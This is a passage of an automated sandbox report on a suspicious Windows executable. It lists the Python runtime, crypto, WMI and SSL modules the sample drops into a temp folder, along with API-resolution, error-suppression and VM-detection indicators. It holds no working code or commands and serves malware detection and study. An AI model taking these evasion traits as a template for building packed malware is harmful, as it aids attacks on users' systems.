        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\python3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2b.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA1.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_RIPEMD160.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libcrypto-3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140_1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ecb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libssl-3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des3.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\bcrypt\_bcrypt.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\libffi-8.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cast.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\select.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cbc.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF602995090 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF602995090
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF288816 sgdt fword ptr [rax]1_2_00007FFDFF288816
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD5.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ofb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography\hazmat\bindings\_rust.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\python312.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ctr.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_cfb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2s.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aesni.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ocb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_aes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\unicodedata.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\python3.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_BLAKE2b.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-string-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA1.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_chacha20.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_MD4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-file-l2-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\pyexpat.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_RIPEMD160.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_ecb.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_wmi.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_arc2.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_raw_des3.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\bcrypt\_bcrypt.cp312-win_amd64.pydJump to dropped file
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pydJump to dropped file
